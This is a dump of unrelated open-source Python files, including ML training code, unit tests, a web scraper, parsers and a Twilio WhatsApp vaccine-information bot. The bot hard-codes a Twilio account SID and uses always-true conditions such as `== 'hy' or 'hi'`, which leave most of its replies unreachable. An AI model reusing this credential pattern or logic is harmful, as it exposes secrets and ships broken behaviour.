data_path = os.listdir(img_dir_non_faces)
for f1 in data_path:
    HF = []
    img_path = img_dir_non_faces + f1
    img = mpimg.imread(img_path)
    imglength = len(img)
    integral_image = img.copy()
    int_img(integral_image, imglength)
    for location in Harr1Map:
        HF.append(Harr1(integral_image, location))
    for location in Harr2Map:
        HF.append(Harr2(integral_image, location))
    for location in Harr3Map:
        HF.append(Harr3(integral_image, location))
    for location in Harr4Map:
        HF.append(Harr4(integral_image, location))
    label = [-1]
    feature = HF + label
    trainingset.append(feature)
# ------------------------------------------
toc = time.time()
# ------------------------------------------
print('total time = ', toc-tic, 's')
# Persist the full (features + label) matrix for the AdaBoost stage.
trainingset = np.array(trainingset)
np.save('trainingset.npy', trainingset)
| StarcoderdataPython |
153739 | """
Do Not Edit this file. You may and are encouraged to look at it for reference.
"""
import unittest
import re
import gas_mileage
class TestListTrips(unittest.TestCase):
    """Unit tests for gas_mileage.listTrips."""
    def verifyLines(self, notebook, mpg):
        """Assert listTrips(notebook) returns one line per trip containing
        the date, miles, gallons and the expected MPG (case-insensitive
        substring matches)."""
        from gas_mileage import listTrips
        trips = listTrips(notebook)
        self.assertTrue(type(trips) is list, 'listTrips did not return a list')
        self.assertTrue(len(trips) == len(notebook))
        for i in range(len(trips)):
            nb = notebook[i]
            matchdate = nb['date']
            matchmiles = str(nb['miles']) + ' miles'
            matchgallons = str(nb['gallons']) + ' gallons'
            matchmpg = str(mpg[i]) + ' mpg'
            trip = trips[i]
            self.assertTrue(matchdate.lower() in trip.lower(), '"' + nb['date'] + '" not found in "' + trip + '"')
            self.assertTrue(matchmiles.lower() in trip.lower(),
                            '"' + str(nb['miles']) + ' miles" not found in "' + trip + '"')
            self.assertTrue(matchgallons.lower() in trip.lower(),
                            '"' + str(nb['gallons']) + ' gallons" not found in "' + trip + '"')
            self.assertTrue(matchmpg.lower() in trip.lower(), '"' + str(mpg[i]) + ' MPG" not found in "' + trip + '"')
    def test001_listTripsExists(self):
        """The function must exist in the gas_mileage module."""
        self.assertTrue('listTrips' in dir(gas_mileage),
                        'Function "listTrips" is not defined, check your spelling')
        return
    def test002_listTripsEmptyNotebook(self):
        """An empty notebook must yield an empty list."""
        from gas_mileage import listTrips
        notebook = []
        lines = listTrips(notebook)
        self.assertTrue(type(lines) is list, 'listTrips did not return a list')
        self.assertTrue(len(lines) == 0, 'There were no trips but you returned lines')
    def test003_listTrips(self):
        """Three-trip notebook with whole-number MPG values."""
        notebook = [
            {'date': '01/01/2017', 'miles': 300.0, 'gallons': 10.0},
            {'date': '01/05/2017', 'miles': 182.0, 'gallons': 7.0},
            {'date': '01/15/2017', 'miles': 240.0, 'gallons': 9.6}
        ]
        mpg = [30.0, 26.0, 25.0]
        self.verifyLines(notebook, mpg)
    def test004_listTrips(self):
        """Two-trip notebook with non-slash date formats."""
        notebook = [
            {'date': 'Jan 01', 'miles': 45.0, 'gallons': 1.5},
            {'date': 'Jan 05', 'miles': 405.0, 'gallons': 15.0}
        ]
        mpg = [30.0, 27.0]
        self.verifyLines(notebook, mpg)
if __name__ == '__main__':
    # Run the test suite when executed directly.
    unittest.main()
| StarcoderdataPython |
34158 | # Copyright 2018 <NAME>, <NAME>.
# (Strongly inspired by original Google BERT code and Hugging Face's code)
""" Fine-tuning on A Classification Task with pretrained Transformer """
import itertools
import csv
import fire
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
import tokenization
import models
import optim
import train
import pdb
import numpy as np
import pandas as pd
from utils import set_seeds, get_device, truncate_tokens_pair
import os
def read_explanations(path):
    """Read one explanation table (tab-separated file).

    Columns whose names start with '[SKIP]' are metadata; the first such
    column containing 'UID' identifies the row.  Returns a list of
    (uid, text) pairs where text joins all non-NaN content cells, or []
    (with a warning printed) when no UID column or no rows are found.
    """
    header = []
    uid = None
    df = pd.read_csv(path, sep='\t', dtype=str)
    for name in df.columns:
        if name.startswith('[SKIP]'):
            if 'UID' in name and not uid:
                uid = name
        else:
            header.append(name)
    if not uid or len(df) == 0:
        print('Possibly misformatted file: ' + path)
        return []
    return df.apply(lambda r: (r[uid], ' '.join(str(s) for s in list(r[header]) if not pd.isna(s))), 1).tolist()
tables = '/data/jacob/code/nlp/tfidf/data/annotation/expl-tablestore-export-2017-08-25-230344/tables'
questions = '/data/jacob/code/nlp/tfidf/data/questions/ARC-Elementary+EXPL-Dev.tsv'
def parse_e(e):
    """Parse an explanation field of space-separated ``uid|role`` entries
    and return just the uids, in order."""
    return [entry.split('|')[0] for entry in e.split(' ')]
class CsvDataset(Dataset):
    """ Dataset Class for CSV file """
    labels = None  # unused placeholder
    def __init__(self, pipeline=[]):  # pipeline: list of preprocessing callables
        """Load the explanation tables and questions, keeping only
        questions that have a gold explanation, and build a uid -> text
        lookup for sampling.

        NOTE(review): ``pipeline=[]`` is a mutable default argument (shared
        across instances), and ``warnings`` is used below without being
        imported in this module -- both worth fixing upstream.
        """
        Dataset.__init__(self)
        explanations = []
        for path, _, files in os.walk(tables):
            for file in files:
                explanations += read_explanations(os.path.join(path, file))
        if not explanations:
            warnings.warn('Empty explanations')
        df_q = pd.read_csv(questions, sep='\t', dtype=str)
        df_e = pd.DataFrame(explanations, columns=('uid', 'text'))
        q_list = []
        e_list = []
        dict_e = {}
        num_e = len(df_e['uid'])
        num_q = len(df_q['questionID'])
        # uid -> explanation text lookup
        for i in range(num_e):
            dict_e[df_e['uid'][i]] = df_e['text'][i]
        # keep only questions with a non-missing explanation field
        for i in range(num_q):
            if not df_q['explanation'][i] is np.nan:
                q_list.append(df_q['Question'][i])
                e_list.append(parse_e(df_q['explanation'][i]))
        self.q_list = q_list
        self.e_list = e_list
        self.dict_e = dict_e
        self.pipeline = pipeline
        self.es = list(dict_e.keys())
        self.num_neg = 75  # negatives sampled per question
    def __len__(self):
        """Number of questions that have explanations."""
        return len(self.q_list)
    def __getitem__(self, index):
        """Build one training group: 1 positive + num_neg random negatives.

        Each sample is a ('label', question, explanation) tuple run through
        every pipeline step; label '1' marks the positive.  Returns a list
        of LongTensors, one per pipeline output field, stacked across the
        1 + num_neg samples.
        NOTE(review): negatives are drawn uniformly from all explanations
        and can collide with the question's gold uids -- confirm that is
        acceptable for training.
        """
        q = self.q_list[index]
        e = self.e_list[index]
        # positive: one of this question's gold explanation sentences
        pos = self.dict_e[np.random.choice(e)]
        samples = []
        instance = ('1', q, pos)
        for proc in self.pipeline:
            instance = proc(instance)
        samples.append(instance)
        for i in range(self.num_neg):
            neg = self.dict_e[np.random.choice(self.es)]
            instance = ('0', q, neg)
            for proc in self.pipeline:
                instance = proc(instance)
            samples.append(instance)
        data = [torch.tensor(x, dtype=torch.long) for x in zip(*samples)]
        return data
class Pipeline():
    """Abstract preprocessing step; subclasses transform an instance tuple."""

    def __init__(self):
        super().__init__()

    def __call__(self, instance):
        # Subclasses must return the transformed (label, a, b) tuple.
        raise NotImplementedError


class Tokenizing(Pipeline):
    """Normalize and tokenize both texts of a (label, text_a, text_b) triple."""

    def __init__(self, preprocessor, tokenize):
        super().__init__()
        self.preprocessor = preprocessor  # e.g. text normalization
        self.tokenize = tokenize          # tokenizer callable

    def __call__(self, instance):
        label, text_a, text_b = instance
        norm_label = self.preprocessor(label)
        tokens_a = self.tokenize(self.preprocessor(text_a))
        # The second text is optional; empty/None yields no tokens.
        tokens_b = self.tokenize(self.preprocessor(text_b)) if text_b else []
        return (norm_label, tokens_a, tokens_b)


class AddSpecialTokensWithTruncation(Pipeline):
    """Truncate the pair to fit max_len, then insert [CLS]/[SEP] markers."""

    def __init__(self, max_len=512):
        super().__init__()
        self.max_len = max_len

    def __call__(self, instance):
        label, tokens_a, tokens_b = instance
        # Reserve 3 slots for [CLS] a [SEP] b [SEP], or 2 for a single text.
        budget = self.max_len - 3 if tokens_b else self.max_len - 2
        truncate_tokens_pair(tokens_a, tokens_b, budget)
        tokens_a = ['[CLS]'] + tokens_a + ['[SEP]']
        tokens_b = tokens_b + ['[SEP]'] if tokens_b else []
        return (label, tokens_a, tokens_b)


class TokenIndexing(Pipeline):
    """Convert tokens to ids, build segment/mask vectors, zero-pad to max_len."""

    def __init__(self, indexer, labels, max_len=512):
        super().__init__()
        self.indexer = indexer  # callable: tokens -> index list
        # Label name -> label index, in declaration order.
        self.label_map = dict(zip(labels, range(len(labels))))
        self.max_len = max_len

    def __call__(self, instance):
        label, tokens_a, tokens_b = instance
        n_a, n_b = len(tokens_a), len(tokens_b)
        input_ids = self.indexer(tokens_a + tokens_b)
        segment_ids = [0] * n_a + [1] * n_b  # token type ids
        input_mask = [1] * (n_a + n_b)
        label_id = self.label_map[label]
        # Zero-pad every vector to the fixed sequence length.
        padding = [0] * (self.max_len - len(input_ids))
        input_ids.extend(padding)
        segment_ids.extend(padding)
        input_mask.extend(padding)
        return (input_ids, segment_ids, input_mask, label_id)
class Classifier(nn.Module):
    """Transformer encoder with a pooled-[CLS] scoring head.

    The head output is exponentiated and clamped to [0, 100], i.e. the model
    emits positive bounded scores (consumed by neg_logloss as unnormalized
    probabilities) rather than raw logits.
    """

    def __init__(self, cfg, n_labels):
        super().__init__()
        self.transformer = models.Transformer(cfg)
        self.fc = nn.Linear(cfg.dim, cfg.dim)
        self.activ = nn.Tanh()
        self.drop = nn.Dropout(cfg.p_drop_hidden)
        self.classifier = nn.Linear(cfg.dim, n_labels)

    def forward(self, input_ids, segment_ids, input_mask):
        hidden = self.transformer(input_ids, segment_ids, input_mask)
        # Pool on the first sequence position ([CLS]) only.
        pooled = self.activ(self.fc(hidden[:, 0]))
        raw = self.classifier(self.drop(pooled))
        return torch.exp(raw).clamp(0, 100)
#pretrain_file='../uncased_L-12_H-768_A-12/bert_model.ckpt',
#pretrain_file='../exp/bert/pretrain_100k/model_epoch_3_steps_9732.pt',
def neg_logloss(logits):
    """Listwise negative log-likelihood of the first (positive) candidate.

    logits[0] is the positive pair's score; the loss is -log of its share of
    the total score mass, with a small epsilon for numerical safety.
    """
    prob = logits[0] / logits.sum()
    return -torch.log(prob + 1e-4)
def main(task='mrpc',
         train_cfg='config/train_mrpc.json',
         model_cfg='config/bert_base.json',
         data_file='../glue/MRPC/train.tsv',
         model_file=None,
         pretrain_file='../uncased_L-12_H-768_A-12/bert_model.ckpt',
         data_parallel=True,
         vocab='../uncased_L-12_H-768_A-12/vocab.txt',
         save_dir='../exp/bert/mrpc',
         max_len=128,
         mode='train'):
    """Train or evaluate the explanation-ranking classifier.

    NOTE(review): 'task' and 'data_file' are accepted but unused here —
    CsvDataset reads its own hard-coded WorldTree paths.
    mode='train' fine-tunes starting from 'pretrain_file'; mode='eval'
    reports accuracy using the weights in 'model_file'.
    """
    cfg = train.Config.from_json(train_cfg)
    model_cfg = models.Config.from_json(model_cfg)
    set_seeds(cfg.seed)
    tokenizer = tokenization.FullTokenizer(vocab_file=vocab, do_lower_case=True)
    # Tokenize -> add [CLS]/[SEP] with truncation -> ids/segments/mask.
    pipeline = [Tokenizing(tokenizer.convert_to_unicode, tokenizer.tokenize),
                AddSpecialTokensWithTruncation(max_len),
                TokenIndexing(tokenizer.convert_tokens_to_ids,
                              ('0', '1'), max_len)]
    dataset = CsvDataset(pipeline)
    # batch_size=1: each dataset item already packs one question's whole
    # candidate set (1 positive + num_neg negatives).
    data_iter = DataLoader(dataset, batch_size=1, shuffle=True)
    # Single output unit: the model scores each (question, explanation) pair.
    model = Classifier(model_cfg, 1)
    criterion = nn.CrossEntropyLoss()  # unused in 'train' mode (see get_loss)
    trainer = train.Trainer(cfg,
                            model,
                            data_iter,
                            optim.optim4GPU(cfg, model),
                            save_dir, get_device())

    if mode == 'train':
        def get_loss(model, batch, global_step):  # make sure loss is a scalar tensor
            # b[0] strips the DataLoader's singleton batch dimension.
            input_ids, segment_ids, input_mask, label_id = [b[0] for b in batch]
            logits = model(input_ids, segment_ids, input_mask)
            # Listwise loss: the positive pair sits at row 0 of the set.
            loss = neg_logloss(logits)
            return loss

        trainer.train(get_loss, model_file, pretrain_file, data_parallel)

    elif mode == 'eval':
        def evaluate(model, batch):
            input_ids, segment_ids, input_mask, label_id = batch
            logits = model(input_ids, segment_ids, input_mask)
            _, label_pred = logits.max(1)
            result = (label_pred == label_id).float()  # .cpu().numpy()
            accuracy = result.mean()
            return accuracy, result

        results = trainer.eval(evaluate, model_file, data_parallel)
        total_accuracy = torch.cat(results).mean().item()
        print('Accuracy:', total_accuracy)
if __name__ == '__main__':
    # Expose main()'s keyword arguments as CLI flags via python-fire.
    fire.Fire(main)
| StarcoderdataPython |
3315192 | <reponame>ruizhang95/routeplanner
import numpy as np
import networkx as nx
from planner.dijkstra import Dijkstra
from utils.heuristic import heuristic2D
class BreadthFirst(Dijkstra):
    """Planner whose edge relaxation uses the heuristic distance between
    neighbouring cells as the edge cost.

    NOTE(review): despite the name, _relax performs weighted Dijkstra-style
    relaxation, not plain breadth-first expansion — confirm the intended
    naming with the package authors.
    """

    def __init__(self, heuristic='octile', alpha=2):
        """
        Params:
            heuristic: {'manhattan', 'chebyshev', 'octile','euclidean','null'} (default: 'manhattan')
                methods to compute heuristic.
            alpha: a number in range of [0, 2] (default: 1)
                if alpha is 0, it becomes best first search; if alpha is 1, it is A*;
                if alpha is 2, it becomes dijkstra algorithm.
                Warning: be really careful to select alpha, because it trades off between
                accuracy and speed.
        """
        super().__init__(heuristic=heuristic, alpha=alpha)

    def _relax(self, u, v):
        """Perform edge relaxation.

        Params:
            u: a tuple representing the coordinates of the node u
            v: a tuple representing the coordinates of the node v
        """
        # g_val is the tentative actual distance from node v to the source via
        # u; self.h(u, v) serves as the edge weight between neighbours here.
        g_val = self.nodes[u]['g'] + self.h(u, v)
        # Relax node v from node u: adopt the cheaper route through u.
        if g_val < self.nodes[v]['g']:
            f_val = g_val  # no extra heuristic term is added to the priority
            self.nodes[v]['g'] = g_val
            self.nodes[v]['f'] = f_val
            self.nodes[v]['parent'] = u
            # If the node is not already queued (unvisited, or closed but now
            # reachable more cheaply), push it onto the open priority queue.
            if v not in self.open:
                self.open.add(v, f_val)
| StarcoderdataPython |
1701268 | <gh_stars>1-10
import os
import pytesseract
from PIL import Image
import cv2
from plate import Segmentation
if __name__ == "__main__":
    # OCR every sample image in testData/ and print the recognized plate text.
    images = os.listdir('testData/')
    print(images)
    for image in images:
        img_path = "./testData/{}".format(image)
        # Remove the previous run's OCR artifact if present.
        # NOTE(review): os.system('rm ...') is Unix-only; os.remove would be
        # portable and avoid a shell.
        if os.path.exists(os.path.join(os.getcwd(), "./output.png")):
            os.system("rm ./output.png")
        # NOTE(review): rebinds the loop variable 'image' (a filename) to the
        # loaded pixel array — harmless, since the filename was already used.
        image = cv2.imread(img_path)
        seg = Segmentation(image)
        img = seg.plateSearch()
        if img:
            # text = pytesseract.image_to_string(Image.fromarray(img))
            # Assumes plateSearch wrote ./output.png as a side effect — TODO
            # confirm against plate.Segmentation.
            text = pytesseract.image_to_string(Image.open("./output.png"))
            print(text)
        else:
            print("No number plate found")
3234064 | #!/usr/bin/env python
from __future__ import print_function
import unittest
import rostest
import rospy
from rospy.service import ServiceException
from test_ros_services import assert_raises
from test_ros_services import call_service
# Node/test name shared by rospy.init_node and rostest.unitrun below.
TEST_NAME = 'test_remapping'
class Test(unittest.TestCase):
    """Integration test for topic remappings reported by the capability server."""

    def test_remapping(self):
        """Remappings are only queryable after the capability is started."""
        # Before start_capability, get_remappings for the interface must fail.
        with assert_raises(ServiceException):
            call_service('/capability_server/get_remappings', 'robot_base_pkg/FrontDistance')
        call_service('/capability_server/start_capability', 'robot_base_pkg/FrontDistance', '')
        # Interface: exactly one remapped topic is expected.
        resp = call_service('/capability_server/get_remappings', 'robot_base_pkg/FrontDistance')
        assert len(resp.topics) == 1, resp
        assert ('front/distance', 'robot/front/distance') in [(t.key, t.value) for t in resp.topics], resp
        # Provider view of the same remapping.
        resp = call_service('/capability_server/get_remappings', 'robot_base_pkg/front_distance')
        assert resp.topics, resp
        assert ('front/distance', 'robot/front/distance') in [(t.key, t.value) for t in resp.topics], resp
        # Semantic interface view: the key differs but maps to the same topic.
        resp = call_service('/capability_server/get_remappings', 'robot_base_pkg/Distance')
        assert resp.topics, resp
        assert ('distance', 'robot/front/distance') in [(t.key, t.value) for t in resp.topics], resp
if __name__ == '__main__':
    # rostest requires an initialized node before running the suite.
    rospy.init_node(TEST_NAME, anonymous=True)
    rostest.unitrun('capabilities', TEST_NAME, Test)
| StarcoderdataPython |
3208061 | <reponame>Pandaaaa906/product_spider<gh_stars>0
from scrapy import Request
from product_spider.items import RawData
from product_spider.utils.spider_mixin import BaseSpider
class SynChemSpider(BaseSpider):
    """Scrapes product listings and detail pages from synchem.de."""
    name = "synchem"
    base_url = "https://www.synchem.de/"
    start_urls = ["https://www.synchem.de/shop/", ]

    def parse(self, response):
        """Follow every product link on a listing page, then paginate."""
        urls = response.xpath('//h4[@class="entry-title"]/a/@href').extract()
        for url in urls:
            yield Request(url, callback=self.parse_detail)
        # "act" marks the current page; its next sibling is the next page link.
        next_page = response.xpath('//a[@class="act"]/following-sibling::a[1]/@href').get()
        if next_page:
            yield Request(next_page, callback=self.parse)

    def parse_detail(self, response):
        """Extract one product's attributes into a RawData item."""
        d = {
            "brand": "synchem",
            # All category names, joined with ';'.
            "parent": ';'.join(response.xpath('//td[@class="product_categories"]//a/text()').getall()),
            "cat_no": response.xpath('//td[@class="product_sku"]//text()').get(),
            "en_name": response.xpath('//h1[@class="product_title entry-title"]/text()').get(),
            # The class value intentionally contains a space ("td_value_CAS Number").
            "cas": response.xpath('//td[@class="td_value_CAS Number"]//text()').get(),
            "mf": "".join(response.xpath('//td[@class="td_value_Molecular Formula"]//text()').getall()),
            "mw": response.xpath('//td[@class="td_value_Molecular Weight"]//text()').get(),
            "img_url": response.xpath('//figure//a/@href').get(),
            # Other/alternate names, ';'-joined and trimmed.
            "info1": str.strip(';'.join(response.xpath('//td[@class="td_value_Other Names"]//text()').getall())),
            "prd_url": response.request.url,
            # Price/availability text as shown on the page.
            "stock_info": str.strip(''.join(response.xpath('//p[@class="price"]//text()').getall())),
        }
        yield RawData(**d)
| StarcoderdataPython |
1699584 | """
This is a test of Pydantic's ability to parse recursive data.
In particular, I'm investigating how it might handle Amazon's state language.
For example, Choice states have very simple rules that might still be tough
to implement.
"""
import enum
import json
from typing import Dict, List, Optional
import pydantic
# Sample Amazon States Language document exercising nested Choice rules
# (Not/Or combinators) against the pydantic models defined below.
json_document = {
    "StartAt": "State1",
    "States": {
        "State1": {
            "Type": "Choice",
            "Choices": [
                {
                    "Next": "StateEnd",
                    "Variable": "$.key",
                    "StringEquals": "some-expected-value",
                },
                {
                    "Next": "StateEnd",
                    "Not": {
                        "Or": [
                            {
                                "Variable": "$.inconsistent",
                                "IsPresent": True,
                            },
                            {
                                "Variable": "$.inconsistent",
                                "StringNotEquals": "some-other-value",
                            },
                        ],
                    },
                },
            ],
        },
        "StateEnd": {
            "Type": "Pass",
            "End": True,
        },
    },
}
class Comparison(pydantic.BaseModel):
    """One Choice-rule comparison; recursive via the Not/Or combinators.

    NOTE(review): this model references itself through string forward refs —
    pydantic v1 typically needs Comparison.update_forward_refs(); confirm the
    installed version resolves them automatically (the module-level assert
    below suggests it does in this environment).
    """
    # JSONPath-style reference into the state input ("$.something").
    Variable: Optional[pydantic.constr(regex=r"\$\..+")]
    StringEquals: Optional[pydantic.StrictStr]
    StringNotEquals: Optional[pydantic.StrictStr]
    IsPresent: Optional[pydantic.StrictBool]
    # Boolean combinators, each nesting further comparisons.
    Not: Optional['Comparison']
    Or: Optional[List['Comparison']]
class TopComparison(Comparison):
    """Top-level Choice rule.

    Only the top-level comparison can have a "Next" field (the transition
    target taken when the rule matches); nested comparisons inherit the
    plain Comparison shape.
    """
    Next: pydantic.StrictStr
class StateTypeEnum(str, enum.Enum):
    """Subset of state types exercised by this experiment."""
    Pass = "Pass"
    Choice = "Choice"
class IndividualState(pydantic.BaseModel):
    """A single state: Choice states carry 'Choices', terminal states 'End'."""
    Type: StateTypeEnum
    Choices: Optional[List[TopComparison]]
    End: Optional[bool]
class StateLanguage(pydantic.BaseModel):
    """Root document: entry state name plus the map of all states."""
    # State name: strictly a string, non-empty, at most 128 characters.
    StartAt: pydantic.constr(strict=True, min_length=1, max_length=128)
    States: Dict[str, IndividualState]
# Round-trip check: parsing then re-serialising (unset fields excluded) must
# reproduce the input document exactly.
document = StateLanguage(**json_document)
assert json.loads(document.json(exclude_unset=True)) == json_document
# Conclusions thus far:
#
# * Recursion seems to work well.
# * I need to test validation for mutually-exclusive elements.
#
| StarcoderdataPython |
3262138 | # import aiosip
# import pytest
# import asyncio
# import itertools
#
#
# @pytest.mark.parametrize('close_order', itertools.permutations(('client', 'server', 'proxy'))) # noQa C901: too complex
# async def test_proxy_subscribe(test_server, test_proxy, protocol, loop, from_details, to_details, close_order):
# callback_complete = loop.create_future()
# callback_complete_proxy = loop.create_future()
#
# class ServerDialplan(aiosip.BaseDialplan):
#
# async def resolve(self, *args, **kwargs):
# await super().resolve(*args, **kwargs)
# return self.subscribe
#
# async def subscribe(self, request, message):
# await request.prepare(status_code=200)
# callback_complete.set_result(message)
#
# class ProxyDialplan(aiosip.BaseDialplan):
# async def resolve(self, *args, **kwargs):
# await super().resolve(*args, **kwargs)
#
# return self.proxy_subscribe
#
# async def proxy_subscribe(self, request, message):
# dialog = await request.proxy(message)
# callback_complete_proxy.set_result(message)
# async for message in dialog:
# dialog.proxy(message)
#
# app = aiosip.Application(loop=loop, debug=True)
#
# server_app = aiosip.Application(loop=loop, debug=True, dialplan=ServerDialplan())
# await test_server(server_app)
#
# proxy_app = aiosip.Application(loop=loop, dialplan=ProxyDialplan())
# proxy = await test_proxy(proxy_app)
#
# peer = await app.connect(
# protocol=protocol,
# remote_addr=(proxy.sip_config['server_host'], proxy.sip_config['server_port'])
# )
#
# await peer.subscribe(
# expires=1800,
# from_details=aiosip.Contact.from_header(from_details),
# to_details=aiosip.Contact.from_header(to_details),
# )
#
# received_request_server = await asyncio.wait_for(callback_complete, timeout=2)
# received_request_proxy = await asyncio.wait_for(callback_complete_proxy, timeout=2)
#
# assert received_request_server.method == 'SUBSCRIBE'
# assert received_request_server.payload == received_request_proxy.payload
# assert received_request_server.headers == received_request_proxy.headers
#
# for item in close_order:
# if item == 'client':
# await app.close()
# elif item == 'server':
# await server_app.close()
# elif item == 'proxy':
# await proxy_app.close()
# else:
# raise ValueError('Invalid close_order')
#
#
# @pytest.mark.parametrize('close_order', itertools.permutations(('client', 'server', 'proxy'))) # noQa C901: too complex
# async def test_proxy_notify(test_server, test_proxy, protocol, loop, from_details, to_details, close_order):
#
# callback_complete = loop.create_future()
# callback_complete_proxy = loop.create_future()
#
# class ServerDialpan(aiosip.BaseDialplan):
#
# async def resolve(self, *args, **kwargs):
# await super().resolve(*args, **kwargs)
#
# return self.subscribe
#
# async def subscribe(self, request, message):
# dialog = await request.prepare(status_code=200)
# await asyncio.sleep(0.2)
# await dialog.notify(payload='1')
#
# class ProxyDialplan(aiosip.BaseDialplan):
# async def resolve(self, *args, **kwargs):
# await super().resolve(*args, **kwargs)
#
# return self.proxy_subscribe
#
# async def proxy_subscribe(self, request, message):
# dialog = await request.proxy(message)
#
# async for message in dialog:
# dialog.proxy(message)
#
# if message.method == 'NOTIFY':
# callback_complete_proxy.set_result(message)
#
# app = aiosip.Application(loop=loop, debug=True)
#
# server_app = aiosip.Application(loop=loop, debug=True, dialplan=ServerDialpan())
# await test_server(server_app)
#
# proxy_app = aiosip.Application(loop=loop, debug=True, dialplan=ProxyDialplan())
# proxy = await test_proxy(proxy_app)
#
# peer = await app.connect(
# protocol=protocol,
# remote_addr=(proxy.sip_config['server_host'], proxy.sip_config['server_port'])
# )
#
# subscription = await peer.subscribe(
# expires=1800,
# from_details=aiosip.Contact.from_header(from_details),
# to_details=aiosip.Contact.from_header(to_details)
# )
#
# async for msg in subscription:
# await subscription.reply(msg, 200)
# callback_complete.set_result(msg)
# break # We only expect a single message
#
# received_notify_server = await asyncio.wait_for(callback_complete, timeout=2)
# received_notify_proxy = await asyncio.wait_for(callback_complete_proxy, timeout=2)
#
# assert received_notify_server.method == 'NOTIFY'
# assert received_notify_server.payload == '1'
#
# assert received_notify_server.payload == received_notify_proxy.payload
# assert received_notify_server.headers == received_notify_proxy.headers
#
# for item in close_order:
# if item == 'client':
# await app.close()
# elif item == 'server':
# await server_app.close()
# elif item == 'proxy':
# await proxy_app.close()
# else:
# raise ValueError('Invalid close_order')
| StarcoderdataPython |
54217 | <gh_stars>1-10
import logging
import re
# Module-level logger used by the parser class below.
log = logging.getLogger(__name__)
# Regex patterns, tried in order per line; named groups become entries in the
# parsed attribute dictionary.
ALL_PAT = [
    "^fc\d+\/\d+\s+(?P<sfp_present>.*)",
    "Name is (?P<name>\S+)",
    "Manufacturer's part number is (?P<part_number>\S+)",
    "Cisco extended id is (?P<cisco_id>.*)",
    "Cisco part number is (?P<cisco_part_number>\S+)",
    "Cisco pid is (?P<cisco_product_id>\S+)",
    "Nominal bit rate is (?P<bit_rate>\d+)",
    "Min speed:\s+(?P<min_speed>\d+)\s+Mb/s,\s+Max speed:\s+(?P<max_speed>\d+)",
    "Temperature\s+(?P<temperature>\S+ C)",
    "Voltage\s+(?P<voltage>\S+ V)",
    "Current\s+(?P<current>\S+ mA)",
    "Tx Power\s+(?P<tx_power>\S+ dBm)",
    "Rx Power\s+(?P<rx_power>\S+ dBm)",
]


class ShowInterfaceTransceiverDetail(object):
    """Parse 'show interface transceiver detail' output into attributes."""

    def __init__(self, outlines, vsan_id=None):
        self._group_dict = {}
        self.process_all(outlines)
        log.debug(self._group_dict)

    def process_all(self, outlines):
        """Scan every output line; first matching pattern wins per line."""
        for raw_line in outlines:
            line = raw_line.strip()
            for pattern in ALL_PAT:
                found = re.search(pattern, line)
                if found is not None:
                    self._group_dict.update(found.groupdict())
                    break

    def _get(self, key):
        """Captured value for *key*, or None when it never matched."""
        return self._group_dict.get(key, None)

    @property
    def sfp_present(self):
        status = self._get("sfp_present")
        if status is None:
            return None
        return "sfp is present" in status

    @property
    def name(self):
        return self._get("name")

    @property
    def part_number(self):
        return self._get("part_number")

    @property
    def cisco_id(self):
        return self._get("cisco_id")

    @property
    def cisco_part_number(self):
        return self._get("cisco_part_number")

    @property
    def cisco_product_id(self):
        return self._get("cisco_product_id")

    @property
    def bit_rate(self):
        # Nominal bit rate as an int (Mb/s per the device output), else None.
        raw = self._get("bit_rate")
        return int(raw) if raw is not None else None

    @property
    def min_speed(self):
        return self._get("min_speed")

    @property
    def max_speed(self):
        return self._get("max_speed")

    @property
    def temperature(self):
        return self._get("temperature")

    @property
    def voltage(self):
        return self._get("voltage")

    @property
    def current(self):
        return self._get("current")

    @property
    def tx_power(self):
        return self._get("tx_power")

    @property
    def rx_power(self):
        return self._get("rx_power")
180355 | <reponame>malonedon/whatsaap-bot<filename>bot.py
import os
from dotenv import load_dotenv
from flask import Flask, request
from twilio.twiml.messaging_response import MessagingResponse
from twilio.rest import Client
import time
# Capture startup date/time components for the greeting banner.
date_time=time.localtime()
year=date_time[0]
month=date_time[1]
day=date_time[2]
# WARNING(review): this rebinds the name 'time' from the module to a string,
# so the 'time' module becomes unusable from here on.
time=str(date_time[3])+":"+str(date_time[4])
load_dotenv()
app = Flask(__name__)
# NOTE(review): credentials are hard-coded despite load_dotenv() above; they
# should come from the environment instead of the source file.
TWILIO_SID = "ACaffe33385ebba23a9fb41bd774e87d2e"
TWILIO_AUTHTOKEN = "<PASSWORD>"
client = Client(TWILIO_SID,TWILIO_AUTHTOKEN)
def respond(message):
    """Wrap *message* in TwiML and return the XML string Twilio expects."""
    twiml = MessagingResponse()
    twiml.message(message)
    return str(twiml)
@app.route('/message', methods=['POST'])
def reply():
    """WhatsApp webhook: map an incoming keyword to a canned TwiML reply.

    Fixes vs. the original:
    - Conditions of the form ``message == "hy" or "hi"`` were always true
      (a non-empty string literal is truthy), so every message received the
      welcome text and all later branches were unreachable; they now use
      ``message in (...)``.
    - The body is stripped and keywords are compared in lower case, so the
      vaccine keyword (previously compared against a value with a trailing
      newline) and capitalised keywords can actually match.
    - Removed unreachable local string assignments that were never used.
    - Unknown keywords get a fallback reply instead of returning None, which
      previously made Flask raise a 500 error.
    """
    message = request.form.get('Body').lower().strip()
    if message == "link":
        return respond(f"https://console.twilio.com/us1/billing/manage-billing/upgrade?frameUrl=%2Fconsole%2Fbilling%2Fupgrade%3F__override_layout__%3Dembed%26bifrost%3Dtrue%26x-target-region%3Dus1")
    if message in ("hy", "hi", "hello"):
        return respond(f"Welcome to the official Ministry of Health and Child Care Zimbabwe Typhoid Conjugate Vaccine support service\n"+str(day)+" "+str(month)+" "+str(year)+" "+str(time)+"\nThe right infomation is important.This service provides infomation on the typhoid conjugate vaccination campaign\nWhat would you like to know typhoid vaccinnation?.\nReply with a key word in bold to get the infomation you need\n vaccine\n child details\n vaccination centers \n symptoms \n basic infomation \n Wellness tips \n Covid19 \n Share this service..")
    if message in ("what is typhoid", "typhoid"):
        return respond(f"typhoid fever is a life threatning infection caused by the bacteriumsalmonella typhi.It is ussually spread through contanimated food or water.")
    if message == "vaccine":
        return respond("""1.Vaccines are safe and effective-Any licenced vaccine is rigously tested before it is approved for use
\n-It is reguraly reassed
\n-it is also monitored for side effects
\n2. Vaccines prevent deadly illnesses
\n-Vaccines protect children from diseases like measles(gwirikwiti
\n-polio
\n3.Vaccines provide better immunity than natural infections:
\n-the immune response to vaccines is similar to the one produced by natuarl infections but is less risky
\n4.Combined vaccines are safe and beneficial
\n-Giving several vaccines at the same time has no effects on the childs health
\n5. If we stop vaccination with better hygiene,diseases will return.
\nwhen people are not vaccinated,infectious diseases that have become uncommon will quickly reappear.
""")
